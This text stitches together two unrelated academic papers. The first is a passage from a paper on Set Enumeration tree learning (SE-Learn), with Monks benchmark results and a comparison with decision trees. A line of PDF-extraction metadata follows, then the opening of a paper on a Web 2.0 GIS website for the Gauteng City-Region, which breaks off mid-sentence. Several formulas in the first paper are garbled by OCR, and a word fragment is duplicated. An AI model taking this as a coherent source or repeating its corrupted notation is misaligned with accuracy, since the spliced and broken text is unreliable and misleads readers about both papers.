Buntine’s dichotomy, we believe that an ideal learning system must eliminate search bias. Put differently, bias should be stated by the user, independently from the particular algorithm used. We believe SE-trees represent a step in that direction. So far, we have introduced a single bias – a prefer- ence for kernel rules. Next, when presenting the SE-Learn family of learning algorithms, we defer the introduction of bias to the latest possible. A variety of user-defined preference criteria can be plugged into the learning and/or classification algorithms. 3 A LEARNING ALGORITHM 3.1 SET ENUMERATION TREES Many problems in Computer Science were formalized to admit solutions in the form of sets, or in the form of partial instantiations of a set of variables. Typically, such sets are required to satisfy some problem-specific criterion which designates them as solutions. In addition, where multiple solutions may exist, they are often ranked by their plausibility, likelihood, or desirability. Regularly, such preference involves a minimality (or maximality) criterion, e.g. minimal entropy, maximum probability or utility, etc. Set Enumeration (SE) trees [Rymon, 92] were shown to be useful as the basis for a unifying search-based framework for such domains. SE-trees support complete, irredundant, and prioritized search; their special structure allows for efficient pruning and other optimizations. Let ATTRS = \{A_i\}_{i=1}^n be a set of attributes with domains Dom(A_i) respectively, and let ind:ATTRS → INT be an indexing of the set of attributes. We define the SE-tree View of a partial description S as follows: \[ \text{View}(S) \overset{\text{def}}{=} \{ A \in \text{ATTRS} | \text{ind}(A) > \max_{A' \in \text{ind}(A')} \} \] **Definition 3.1 Extended Set Enumeration Tree** The extended SE-tree for a set of attributes ATTRS is defined as follows: 1. At its root is a node labeled with the empty set; 2. Recursively, let S be a node's label, it has children labeled as follows: \[ \{ \cup \{A=v\} | A \in \text{View}(S), v \in \text{Dom}(A)\} \] **Example 3.2** Figure 1 depicts an extended SE-tree for the complete 3BIN space. Note that restricting a node's expansion to its View, ensures that every member of 3BIN is uniquely explored within the tree. Representing all elements of a power-set, the complete SE-tree is clearly exponential in size. However, in a large class of problems, especially where solutions are monotonic with respect to set inclusion, the SE-tree can be used to induce a complete and yet efficient search because it allows for systematic pruning [Rymon, 92]. ![Figure 1: Complete SE-tree for 3 Binary Variables](image) 3.2 SE-TREE-BASED LEARNING Aimed at all kernel rules, SE-Learn (Algorithm 3.4) explores top-down an imaginary SE-tree. Nodes are explored by some predetermined priority function. In Sections 4 and 5, we show this prioritization useful in implementing various biases. In expanding open nodes, SE-Learn exploits the SE-tree structure to prune away nodes that cannot lead to kernel rules. SE-Learn’s output is an SE-tree which leaves are labeled with kernel rules. **Definition 3.3 Candidate and Impotent Expansions** Let S be a node, \( \text{TSET}(S) \overset{\text{def}}{=} \{ t \in \text{TSET} | S \subseteq t \} \). We say that \( S' \overset{\text{def}}{=} \cup \{A=v\} \) is a candidate expansion of S if \( A \in \text{View}(S), v \in \text{Dom}(A) \). However, \( S' \) is impotent if either 1. \( \text{TSET}(S') \) is empty; or 2. \( \text{TSET}(S')=\text{TSET}(S) \); or 3. all objects in \( \text{TSET}(S') \) agree on their assignment to attributes in \( \text{View}(S') \), but there is not a complete agreement on the class (i.e. S' is not a rule). Algorithm 3.4 Program SE-Learn 1. OPEN-NODES ← {∅}; 2. Until OPEN-NODES is empty do 3. Expand (Extract-Min(OPEN-NODES)) Procedure Expand(S) 1. For every candidate expansion $R \overset{\text{def}}{=} \text{SU}\{A=v\}$ that is not impotent and that is not subsumed by a previously discovered rule do 2. If $R$ is a rule then mark it as such; otherwise add it to OPEN-NODES. The algorithm works by exploring nodes along the SE-tree's current fringe (OPEN-NODES) in a best-first fashion. For that purpose, nodes are cached in a priority queue and accessed via an Extract-Min operation. Candidate expansions that are not subsumed by previously discovered rules (step 1) are marked as rules if they satisfy the definition or otherwise marked for expansion and added to the queue for further consideration (step 2). 3.3 EXPLORATION POLICIES An exploration policy is simply the priority function used in Algorithm 3.4 to determine the order in which nodes are explored. It is easy to verify that if nodes are explored by their cardinality (breadth-first exploration of the tree) then the algorithm is correct, i.e. it computes all and only kernel rules. As so far described, any monotonic function $\psi$, i.e. such that $\text{SCS}'$ implies $\psi(S) \leq \psi(S')$, results in Algorithm 3.4 being correct. A large class of interesting functions are monotonic, e.g. ones that are based on probability, utility, or information-gain measures. However, at some computational expense, SE-Learn can be modified to admit non-monotonic exploration policies as well. The sole purpose of the monotonicity restriction is to avoid recording non-minimal solutions; therefore, to remove it, we need to also check whether new rules subsume old ones. Note however that, as so far presented, all exploration policies will result in the same tree structure. The variety of exploration policies allowed will become important next, in specifying and implementing preference criteria. 4 CLASSIFICATION ALGORITHMS Given an SE-tree acquired as above, we want to be able to use it to classify new objects. As in decision tree-based classification algorithms, this is done by following matching paths from the root to class-labeled leaves (rules). Recall however that in the SE-tree representation 1. there may be no such leaf (rule) (we called this incompleteness); or 2. there may be multiple rules (and thus leaves) matching a given object, and they may not always be equally labeled (we called this inconsistency). The SE-tree incompleteness, we argued, is due to the incompleteness of the training data. One way to “complete” the SE-tree is to perform partial matching in cases where there are no perfectly matching rules. The inconsistency property, on the other hand, gives the SE-tree its main power. Roughly, inconsistency reflects a variety of perspectives that could be adopted to logically partition the training data. In a decision tree, a single such perspective is decided upon at the learning phase in the choice of attribute for each branching point. Representing multiple perspectives is more expressive and allows more principled resolution. In particular, hypotheses-space preference, explicitly specified by the user, can be used to resolve conflicts. Algorithm 4.1 uses such preferences directly: by searching the SE-tree best-first with respect to the specified preference, it picks the leaf which maximizes the specified preference from all those matching the object at hand. Algorithm 4.1 Classification via SE-tree Search - **Input:** (1) an object; (2) an SE-tree; and (3) an exploration policy $\psi$ (bias). - **Procedure:** Search SE-tree best-first (according to $\psi$), along paths matching the object. Stop when the first leaf is hit, or when the tree is exhausted. - **Output:** If a leaf was hit, predict its class label. Otherwise, either respond “don’t know”, or guess, or re-search the tree allowing for partial matching. A more general approach involves specifying a resolution criterion, e.g. weighted averaging or voting, which takes into account all rules matching a given object. The two approaches can, of course, be combined by applying the resolution criterion to a subset of the rules – those which rank highest by the preference criterion. The following experiment, using the Monks benchmark [Thrun et al., 91], demonstrates the importance of the particular choice of resolution criterion. In general, a preference and/or a resolution criterion should reflect some domain knowledge. However, given the artificial nature of the Monks problems, we experimented with three generic weight functions: simple voting; quadratic (in the rule's size) weight voting, favoring more specific rules; and inverse quadratic, favoring more general rules. In the learning phase, we simply learned all kernel rules. In classification, when the rules were incomplete, we used partial matching. Conflicts were resolved using each of the three weight functions. Figure 2 compares accuracy obtained using each of the resolution criteria to each other; to the average reported for other decision tree-based programs and to the overall average reported for all methods. Note that SE-Learn's performance is crucially dependent on the resolution criterion used. <table> <thead> <tr> <th></th> <th>Monk1</th> <th>Monk2</th> <th>Monk3</th> </tr> </thead> <tbody> <tr> <td>SE-Learn (inv. quad.)</td> <td>85.9%</td> <td>71.3%</td> <td>95.6%</td> </tr> <tr> <td>SE-Learn (voting)</td> <td>72.6%</td> <td>69.0%</td> <td>88.4%</td> </tr> <tr> <td>SE-Learn (quadratic)</td> <td>64.8%</td> <td>67.1%</td> <td>70.8%</td> </tr> <tr> <td>Average decision trees</td> <td>84.2%</td> <td>67.6%</td> <td>86.9%</td> </tr> <tr> <td>Average overall</td> <td>88.9%</td> <td>76.4%</td> <td>90.9%</td> </tr> </tbody> </table> Figure 2: Various Resolution Criteria 5 BIAS IN THE LEARNING PHASE 5.1 PARTIALLY EXPLORED SE-TREES It may often be intractable, or practically impossible, to explore all kernel rules. Exploration policies can then be used as early as the learning phase to prune away less promising parts of the SE-tree. Even when all kernel rules can be explored, added complexity may not pay in the margin. Worse, as with many other learning frameworks, more complex SE-trees can even have lower accuracy than their simpler subsets. In such instances, it is standard to use hill-climbing procedures and/or anytime algorithms which explore as time/space permit and return the best classifier seen so far. In SE-Learn, the SE-tree can be constructed gradually while testing to make sure that the added complexity of new rules is worth the marginal improvement in accuracy. When interrupted, or when it runs out of resources (particularly space) this procedure will return the best classifier seen so far. The particular exploration policy used plays an important role in this procedure since it determines the order in which rule nodes are seen. Using again the Monks problems, we ran an experiment in which an SE-tree was explored level by level. The change in complexity (measured by the number of rules) and in accuracy (using the inverse quadratic resolution criterion) is depicted in Figure 3. 5.2 SPECIAL COLLECTIONS OF RULES In what follows, we briefly describe variations of SE-Learn that compute SE-trees corresponding to collections of rules with special features. Here too, the particular collection computed is determined by the exploration policy. Consistent Sub-Collections of KRULES A collection of kernel rules is inconsistent w.r.t. UNIVERSE iff it has rules \( R_1, R_2 \) such that \( \pi([R_1]) \neq \pi([R_2]) \) and no attribute appears in both \( R_1 - R_2 \) and \( R_2 - R_1 \). Thus, SE-Learn could be modified not to retain rules which are inconsistent with previously discovered rules. Since the order in which nodes are explored determines which rules are retained, the particular exploration policy used defines a bias. Minimal Sub-Collections of KRULES For TSET-completeness purposes, a rule \( R \) is redundant if every object in TSET that \( R \) matches is also matched by another rule \( R' \). As before, one can modify SE-Learn so as not to retain rules deemed redundant by previously discovered rules. Another alternative is to restrict redundancy to \( n \) rules per training instance, or to rules that satisfy some other acceptance criterion such as statistical significance. Again, the particular exploration policy defines a bias. Consistent and Complete Collections of Rules The down side of discarding inconsistent rules, as suggested above, is that the collection of rules obtained may be incomplete even w.r.t. TSET. To avoid this, rather than discarding such rules, SE-Learn can be modified to further expand them. The collection of rules so obtained are guaranteed to be complete. However, individual rules may no longer be kernel. Minimal and Consistent Collections By removing both inconsistent and redundant rules, one may get a minimal collection of rules that is both complete and consistent. 6 SE-TREE AND DECISION TREES A number of decision tree based algorithms have had an impact on machine learning research. Part of our purpose here is to convince researchers to look at the SE-tree as a more general alternative to decision trees. We devote this section to a broader comparison of the two data structures. 6.1 A FOREST OF DECISION TREES One way to view a decision tree is as an SE-tree in which every possible object has exactly one path along which it can be classified, i.e. an SE-tree that is consistent and complete w.r.t. \textsc{UNIVERSE}. Conversely, one way to view an SE-tree is as a collection, or forest, of decision trees. A single SE-tree can be shown to embed a large number of decision trees. In particular, let $D$ be a decision tree in which attributes were chosen monotonically w.r.t. some indexing function. Let $S$ be an SE-tree constructed in accordance to the same indexing function, then $S$ embeds $D$, i.e. there exists a subset of $S$'s edges which forms a tree that is topologically and semantically equivalent to $D$, and that is rooted at $S$'s root. One particular decision tree is the SE-tree's primary decision tree: the one in which each internal node is expanded with the first attribute in that node's SE-tree View that does not result in impotent expansions. This result can be strengthened to make the SE-tree embed any single decision tree\textsuperscript{2}. In particular, let $D$ be a decision tree that is constructed by any ID3-like procedure. To create an SE-tree that embeds $D$ we may have to slightly alter the definition of an SE-tree to allow for dynamic re-indexing. In particular, we will develop an indexing as we create the tree: 1. At first, we will choose an initial indexing $\text{ind}_{\text{root}}$ in which the first attribute used in $D$ appears first; 2. Then, while at a node labeled $S$, let $\text{ind}_{\text{parent}}(S)$ be the indexing used in expanding $S$'s parent. In $S$, we use an indexing which coincides with $\text{ind}_{\text{parent}}(S)$ on all attributes not in $\text{View}(S)$, but may re-order attributes in $\text{View}(S)$ as we wish. In particular, if a node corresponding to $S$ appears in $D$, we will re-order attributes in $\text{View}(S)$ so that the first attribute used in $D$ to split that node appears first. By construction, $D$ will be embedded in an SE-tree created as above as its primary decision tree. It is fairly easy to verify that the SE-tree remains complete and irredundant, and that SE-Learn remains correct. \textsuperscript{1}An SE-tree, however, can be consistent and complete without being a decision tree. \textsuperscript{2}Not all of them at once; rather a collection that includes a specific decision tree. 6.2 IMPROVING UPON A GIVEN DECISION TREE An important corollary of the result above is that one can construct an exploration policy under which SE-Learn will start off with one's favorite decision tree, and then try to improve it by adding more rule nodes. (This exploration policy may be non-monotonic though.) Of course, rule nodes will only be added to the extent in which accuracy (as tested empirically on a separate training set) is improved. We have tested this approach on the Monks benchmark. In each of the three problems, we started with a decision tree constructed by the information-gain criterion. Then, the rest of the SE-tree was explored breadth-first. Accuracy and complexity were recorded for the primary decision tree, and for each level of the tree in which rules were added (Figure 4). ![Figure 4: Starting from a Decision Tree](image) Note that in all three problems, the accuracy of the primary decision tree could be improved by adding SE-tree nodes, although this improvement is not monotonic. Also note that in Monk1, adding the SE-tree's first level has not only improved the accuracy, but has also reduced the number of rule nodes (some decision tree rules were pruned because they were subsumed by newly discovered rules). 6.3 HYPOTHESES EXPRESSIBILITY Consider the following problem instance: <table> <thead> <tr> <th>A</th> <th>B</th> <th>Class</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>1</td> <td>1</td> <td>1</td> </tr> </tbody> </table> While four different hypotheses are consistent with this training data, there are only two ID3-style\textsuperscript{3} decision trees. \textsuperscript{3}There are more decision trees, but only these can be generated by an ID3-like procedure. cision trees (Figure 5). The corresponding SE-tree contains (as subset of its arcs) both trees, and can be used to represent all four hypotheses depending on the particular exploration policy (bias) used in a given classification session. \begin{figure}[h] \centering \begin{tabular}{c} \begin{tikzpicture} \node (A) at (0,0) {A}; \node (B) at (2,0) {B}; \node (C) at (0,1) {A=0}; \node (D) at (0,2) {A=1}; \node (E) at (2,1) {B=0}; \node (F) at (2,2) {B=1}; \node (0) at (1,0) {0}; \node (1) at (1,1) {1}; \draw (A) -- (C); \draw (A) -- (D); \draw (B) -- (E); \draw (B) -- (F); \end{tikzpicture} \end{tabular} \begin{tabular}{c} (a) Decision Trees \end{tabular} \begin{tabular}{c} \begin{tikzpicture} \node (A) at (0,0) {A=0}; \node (B) at (0,1) {A=1}; \node (C) at (2,0) {B=0}; \node (D) at (2,1) {B=1}; \node (0) at (1,0) {0}; \node (1) at (1,1) {1}; \end{tikzpicture} \end{tabular} \begin{tabular}{c} (b) SE-Tree \end{tabular} \caption{SE-tree versus Decision Trees} \end{figure} Consider, for example, an OR function (not modeled by either decision trees). In SE-Learn, if a search-based approach to classification is adopted (Algorithm 4.1), an OR function can be implemented using an exploration policy that assigns high priority to the arcs A=1 and B=1. Generalizing this problem to n attributes, each taking its values from \{0, \ldots, n-1\}, we are given a training set with the n cases in which all attributes, and the class, are equally labeled. Now, we consider a function that takes the most frequent value among its attributes, with bias towards higher values in case of equality (for n = 2, we get the OR function). Such function cannot be modeled by any of the ID3-style decision trees\(^4\), but can easily be modeled using an SE-tree with a resolution criterion based on simple voting. ### 6.4 Computing Kernel Rules Considering the goal of computing all kernel rules, three problems may arise in a decision tree-based search framework: 1. The minimality problem – rules will often not be discovered in their minimal (kernel) form; 2. The multiplicity problem – each kernel rule may be discovered multiply, disguised in a number of its non-minimal supersets; and 3. The incompleteness problem – some kernel rules may not be discovered at all. Both the minimality problem and the multiplicity phenomenon result from the fact that attributes used high in the tree are necessary for some, but not all, the rules. The minimality problem is often addressed by subsequently pruning the rules extracted from the decision tree (e.g. \cite{Quinlan87}). The replication problem, a special case of multiplicity in which whole sub-trees are replicated, has been addressed by several researchers (e.g. \cite{Rivest87, Pagallo09}). Incompleteness, which is only a problem if one is really interested in all kernel rules, results from the insisted mutual exclusivity of any decision tree’s leaves (see \cite{Weiss91}). None of these problems occurs in the SE-tree-based framework: 1. Rules are always discovered in their kernel form; 2. Kernel rules are always discovered uniquely; and 3. All kernel rules are discovered. ### 6.5 Complexity The SE-tree’s exhaustiveness and large initial branching may be deceiving. Let us first compare its worst-case complexity to that of a decision tree, independently of their use. **Proposition 6.1** If all attributes are b-valued, then the number of nodes in a complete decision tree is \(b^n + b^{n-1} + \cdots + b + 1 > b^n\). The size of a complete SE-tree is \((b + 1)^n\). In sharp contrast, the size of a super-tree containing all decision trees is significantly larger: \(b^n \cdot n!\). Within an induction framework, however, one rarely explores a complete decision tree (nor a complete SE-tree for that matter). In an ID3-like framework, the size of a decision tree is linear in the size of the training data. This is not true of SE-Learn! Kernel rules are close relatives of prime-implicants, and as such we know of pathological examples in which the number of kernel rules is exponential in the size of the training data. On the other hand, as just explained, one does not have to explore the entire SE-tree and one can always have the first nodes explored be those of one’s favorite decision tree. ### 7 Conclusion and Future Research Directions We have proposed an inductive learning framework which uses an SE-tree as a basis for search and classifier representation and have presented a family of algorithms for SE-tree induction and for SE-tree-based classification. We have shown that as a representation for classifiers, SE-trees generalize decision trees in two ways: first, a decision tree is a special case of an SE-tree, and second, an SE-tree contains many decision trees. An SE-tree can also be built by improving upon one’s favorite decision tree. However, unlike decision trees, most of the search bias can be eliminated. in SE-tree-based algorithms; an independently specified hypothesis-space bias can be used instead. Importantly, the SE-tree-based framework can borrow from techniques developed for decision trees. In particular 1. More expressive representation languages can be adopted, e.g. ordered and hierarchical variables, multi-variable tests, class probability trees, etc. Discretization techniques, and criteria developed for selecting a splitting test can be used to handle ordered variables; averaging and smoothing techniques can be used in conjunction with class probabilities representation. 2. Pruning techniques developed for decision trees, e.g. using statistical significance tests, can also be used in SE-trees. 3. Entropy-minimization and other criteria developed for selecting the next splitting attribute in decision trees will likely be useful in selecting an indexing function for an SE-tree which will minimize the number of nodes that have to be explored. More research, however, is needed to figure ways in which these techniques can be deployed effectively. Other areas of future research include general and domain-specific exploration policies and resolution criteria, termination criteria suitable for various tradeoffs between accuracy and time/space, and an incremental version of SE-Learn. Recent advances in search algorithms lend themselves to improved implementation of the SE-tree-based framework, e.g. linear-space best-first search algorithms [Korf, 92, Russell, 92] and a SIMD version of IDA* [Powley et al., 93]. Acknowledgements The idea of using the SE-trees to learn rules originated at a talk by Tom Mitchell — I thank him for that, as well as for later suggestions. I also thank Kevin Atteson, Russ Greiner, Haym Hirsh, Alon Luss, Teow-Hin Ngair, Michael Niv, Greg Provan, Philip Resnik, Nick Short, Scott Weinstein, and anonymous reviewers for commenting on previous drafts. This work was supported in part by a graduate fellowship ARO grant DAAL03-89-C0031PRI. References
{"Source-Url": "http://repository.upenn.edu/cgi/viewcontent.cgi?article=1284&context=cis_reports", "len_cl100k_base": 8029, "olmocr-version": "0.1.48", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 32724, "total-output-tokens": 9423, "length": "2e12", "weborganizer": {"__label__adult": 0.0004220008850097656, "__label__art_design": 0.0005345344543457031, "__label__crime_law": 0.0005207061767578125, "__label__education_jobs": 0.002826690673828125, "__label__entertainment": 0.00012028217315673828, "__label__fashion_beauty": 0.00028324127197265625, "__label__finance_business": 0.0005116462707519531, "__label__food_dining": 0.0004570484161376953, "__label__games": 0.0007877349853515625, "__label__hardware": 0.0013675689697265625, "__label__health": 0.0011816024780273438, "__label__history": 0.0003817081451416016, "__label__home_hobbies": 0.0001959800720214844, "__label__industrial": 0.0007395744323730469, "__label__literature": 0.0005202293395996094, "__label__politics": 0.0003981590270996094, "__label__religion": 0.000637054443359375, "__label__science_tech": 0.2802734375, "__label__social_life": 0.00016200542449951172, "__label__software": 0.01529693603515625, "__label__software_dev": 0.69091796875, "__label__sports_fitness": 0.0004291534423828125, "__label__transportation": 0.0007100105285644531, "__label__travel": 0.0002371072769165039}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35400, 0.03953]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35400, 0.58603]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35400, 0.89879]], "google_gemma-3-12b-it_contains_pii": [[0, 557, false], [557, 1068, null], [1068, 1319, null], [1319, 5232, null], [5232, 9804, null], [9804, 13245, null], [13245, 17842, null], [17842, 22102, null], [22102, 26496, null], [26496, 31403, null], [31403, 35400, null]], "google_gemma-3-12b-it_is_public_document": [[0, 557, true], [557, 1068, null], [1068, 1319, null], [1319, 5232, null], [5232, 9804, null], [9804, 13245, null], [13245, 17842, null], [17842, 22102, null], [22102, 26496, null], [26496, 31403, null], [31403, 35400, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35400, null]], "pdf_page_numbers": [[0, 557, 1], [557, 1068, 2], [1068, 1319, 3], [1319, 5232, 4], [5232, 9804, 5], [9804, 13245, 6], [13245, 17842, 7], [17842, 22102, 8], [22102, 26496, 9], [26496, 31403, 10], [31403, 35400, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35400, 0.04889]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
36920b6bef0836610850057c5fcb87562e678b23
Developing a Web 2.0 GIS website for the Gauteng City-Region C.D. Wray Gauteng City-Region Observatory Partnership of the University of Witwatersrand, University of Johannesburg and Gauteng Provincial Government South Africa chris.wray@gcro.ac.za Abstract Successful Web GIS (Geographical Information System) applications are achieved by the right combination of GIS layers symbolised in a visually dynamic way, with an easy to use application, that is stable and responsive and meets the user requirements of both GIS and non-GIS users. Web 2.0 has produced a flood of development starter kits, sample viewers and APIs (Application Programming Interface), with the result that almost anyone involved in GIS or IT (Information Technology) – even with limited or no programming experience – can build a GIS website. This has lead to an exponential growth of Web GIS applications and data, which although a necessary step in increasing accessibility to spatial data and GIS applications, may result in online mapping applications that do not satisfy user requirements. The Gauteng City-Region Observatory (GCRO) identified a business need to develop a Web 2.0 GIS website to enable users to attain a better understanding of the Gauteng City-Region (GCR). The website makes use of data mashups to integrate data from various sources, and is one of the first government GIS websites in South Africa to utilise open datasets such as Google Maps to provide the base data. The website was built using rich Internet application (RIA) technology provided by the ESRI Adobe Flex viewer to offer an enhanced user experience, with popup windows and dynamic graphs linked to the maps. A five step Web GIS development methodology was employed to build the GCRO GIS website. This paper will examine each of the GIS development design steps that were followed to ensure an optimal functioning application, with responsive and secure map services. Specific Web mapping optimisation techniques, such as applying specific cartographic techniques and map designs to assist in overcoming the additional layer of Web design complexity introduced by spatial data will be reviewed. Keywords: Web 2.0, Web GIS, g-government 1. Introduction Worldwide there has been an explosion of Web 2.0 applications with Internet users embracing applications such as MySpace, Flickr, You Tube, Facebook and Twitter. The 2010 statistics are staggering with over 500 million active users on Facebook (Facebook, 2010) and 190 million users tweeting 65 million times a day on Twitter (Schonfeld, 2010). Prior to Web 2.0, people could access information off the Internet but did not really participate in its evolution (Townes, 2006), i.e. the Web consisted mainly of static Web pages. Web 2.0 in contrast, represents the second generation of Web development and design with new Web applications that enable improved interaction, communication, interoperability and sharing on the Web (Wikipedia contributors, 2009). Web 2.0 is not just about new technologies such as blogs and wikis, it represents a shift in culture that views the Internet as a platform for deploying services, rather than merely a source of information from static Web pages (Hughes, Macmillan & Medd, 2008). Web 2.0 promotes the principles of sharing, collaboration and data integration on the Internet. Web GIS refers to any GIS (Geographic Information System) application that uses Web technologies to communicate between components such as the Web GIS server and a Web browser, desktop or mobile client (Fu & Sun, 2011a:13). Web GIS applications have evolved to support the Web 2.0 principles of rich graphic user interfaces, user participation and data mashups, with commercial mapping applications such as Google Maps, Google Earth, Microsoft Bing Maps, Yahoo Maps and MapQuest, considered to be good examples of Web 2.0 (Fu & Sun, 2011a:10). The growth of Web GIS and online maps is impressive with nearly a billion people having used Google Maps, and at least 500 million downloaded Google Earth (O’Doherty, 2010). However, Murugesan (2007:41) cautions that although Web 2.0 applications have enabled better, faster and richer applications, it also poses a new design and development dilemma: “fast and easy versus well designed and well engineered”. Various open source applications and widgets, small stand-alone applications embedded in third party sites and originally derived from the idea of code re-use (Wikipedia contributors, 2011), are freely available online. Inexperienced developers can easily build applications by copying source code from existing websites or integrating widgets and modifying sample viewers (Rudman, 2010: 217). This “wave of cookie-cutter sites emerging on the Internet”, have been built and deployed, with in many cases very little thought to originality and user interaction with the site (Noyle & Bouwman, 2010:42). Not only is there a danger of good Web design practices being ignored, but developers may, according to Rudman (2010: 217), unknowingly incorporate malicious code into their applications, giving rise to security weaknesses. GIS applications add a further layer of Web design complexity in terms of appropriate cartographic techniques and map design. Web maps have different requirements to traditional maps, as complex detailed Web GIS maps will not be easily understood by users or result in frustratingly slow downloads. Users have grown used to simple map interfaces and fast map downloads from mapping sites such as Google Maps and Bing Maps. Successful and simple to use online maps often means making compromises and resisting classical GIS interfaces which only GIS professionals will understand (Diacono, 2009). A good public mapping website, according to Charlie Savage, founder of social mapping website Mappbuzz, has to be: “the obvious things – fast, intuitive, easy to navigate, nice graphic design – but it shouldn’t overwhelm the user, either with data or unfamiliar concepts” (Diacono, 2009). In January 2010, the GCRO (Gauteng City-Region Observatory) embarked on a project to develop an interactive GIS website for the Gauteng City-Region (GCR). The GCRO is a partnership between the Gauteng Provincial Government (GPG), the University of Johannesburg (UJ) and University of the Witwatersrand, Johannesburg (Wits); with local government also represented on the GCRO board. Behind the motivation for setting up the GCRO is a vision for a fast growing and dynamic GCR, which through better planning and management, and in particular improved co-operative government relations between all spheres of government, will become more functionally integrated, spatially coherent, globally competitive, economically productive, environmentally sustainable and socially inclusive. The GCRO recognised the need to provide online spatial information and GIS tools to develop a better understanding of the GCR, assist the GCR policy-makers to make better informed decisions and open up public access to government datasets. This business need was met through the development of the GCRO GIS website that provided a g-government solution for the GCRO and its provincial and local government stakeholders. G-government relates to the use of maps, the Internet (and more recently Web 2.0 technologies) and GIS to create more effective government service delivery (Thomas, 2001; Tickner, 2009). The website makes use of Web 2.0 technologies such as data mashups to integrate data from various sources. It is one of the first government GIS websites in South Africa to utilise open datasets such as Google Maps to provide the base data, and was built using rich Internet technology (RIA) provided by the ESRI Adobe Flex viewer to offer an enhanced user experience, with popup windows and dynamic graphs linked to the maps. This paper will discuss a Web 2.0 GIS development methodology, with specific reference to the GCRO GIS website and use of ESRI ArcGIS Server Web GIS software. It is important to note that this paper is derived from a Masters research project at the School of Electrical and Information Engineering, Wits (Wray, 2011). Another paper which also draws on the Masters research, but is focused on the use of user- and usage-centric design methodologies and discusses the Technology Acceptance Model (TAM) survey results conducted at the completion of the prototype and website launch, has been prepared for the IEEE Africon 2011 conference. 2. A Web 2.0 GIS design methodology Agrios (2009:44) argues that “effective Web maps have a specific focus and are designed so users can interact with them to accomplish meaningful tasks”. In order to achieve this, a five step methodology for developing an effective Web GIS map application with optimal performance, was used to design and build the GCRO GIS website. This methodology is depicted in Figure 1 and each of the steps will be considered in more detail. 2.1 Step 1: Think about the application and its users Step 1 is an obvious starting point when planning a GIS website, but should be considered carefully in terms of a number of questions to be used as a guide for planning a map-based Web application: - “What is the business need/purpose of the Web mapping application? - Who are the end users? - Is this an internal or external website? - What data will be included in the application? - How will the data be used? Visualisation? Spatial query? Attribute query? - Will the data be used with other services to create a mashup?” (Agrios, 2009:44) These questions were debated during a brainstorming session with GCRO staff held in January 2010. This process assisted GCRO to think about the GCRO GIS website users and how the application could benefit them – important considerations prior to drawing up a GIS website specification. The business need was identified as: enabling users to develop a better understanding of the GCR by providing base data and thematic layers offering different perspectives of the GCR, such as population distribution, poverty and the latest 2009 Quality of Life survey results as Web maps and dynamic graphs; and GIS analysis tools for the user to make better informed decisions and policies regarding the future development of the GCR. The main users of the application were identified as the GCRO staff and stakeholders, namely: the GPG Planning Commission, GPG Office of the Premier, GPG Department of Economic Development, local government officials and other GCR government agencies. These users are responsible for planning the future development and direction of the GCR and are mainly high ranking government officials with no mapping or GIS experience. Hence the need for a simple “Google Maps-like” Web GIS design. Public access was also a requirement, ensuring open access to information describing the GCR through the Internet to all GCR citizens. Therefore, a freely accessible, simple to use, Internet site was required to provide access to local and provincial government and citizens. A Web 2.0 GIS application specification was compiled for the GCRO GIS website that required the use of the latest Web 2.0 tools such as GIS data mashups (including the use of Google Maps to provide the base mapping data), APIs (Application Programming Interface) and RIAs. 2.2 Step 2: Design maps for the Web application 2.2.1 Separating data into base map and operational layers Good Web GIS map design practice is to divide data into base map layers, which primarily are used as background layers, and operational layers that users interact with to perform decision-making and task-based functions (Agrios, 2009:45; ESRI, 2009c). Operational layers are normally served dynamically, whereas base map layers, that typically do not change or require updating frequently, should be cached. According to ESRI (ESRI, 2009a), “Map caching is a very effective way to make your ArcGIS Server maps run faster. When you create a map cache, the server draws the entire map at several different scales and stores copies of the map images. The server can then distribute these images whenever someone asks for a map”. A disadvantage of cache is that it takes a long time to create and should not be used if features are regularly updated, as this would require a regeneration of the map cache each time a layer is updated. One of the reasons that Google Maps download and display so fast is that they make use of server-side caching (ESRI, 2009a). The Google Maps layers were therefore designated as base map layers within the GCRO GIS website, with the API accessing the Google Maps cache from the Google servers. Figure 2: An example of map cache at different scales (ESRI, 2009a) With regard to the various GCRO GIS layers that had been assembled, the data was divided into various themes to be used to analyse and obtain a better understanding of the GCR. Six themes were identified, with the GCRO administrative layers theme designated as a base map as it provided the GCR administrative base map context and is switched on by default when the application is opened. It was not, however, cached and therefore functions like an operational layer. **Figure 3: GCRO GIS application: base map and operational (dynamic theme) layers (Wray, 2011:56)** The remaining five GCRO themes were designated as operational or dynamic themes (illustrated in Figure 3 above). As ESRI ArcGIS server 9.3.1 Web GIS software was utilised by the GCRO to publish the data, the data were mapped and symbolised in ArcMap (ArcView licence), with each of the five operational themes and GCRO administrative layer theme, created in separate ArcMap map documents. ### 2.2.2 Web GIS mapping compromises Diacono (2009) states that “designing maps for the Web means making compromises”. These include: employing strong cartography, using scale dependency to enhance performance and improve clarity and maintaining coordinate systems for all layers used in the application (Agrios, 2009:44). Strong cartography was employed in the GCRO themes by ensuring both the layer symbology and labels were clearly visible on a standard PC (Personal Computer) or laptop screen, and that each layer within a theme was uniquely represented and identifiable with other GCRO theme layers switched on or overlaid on the various Google Maps base 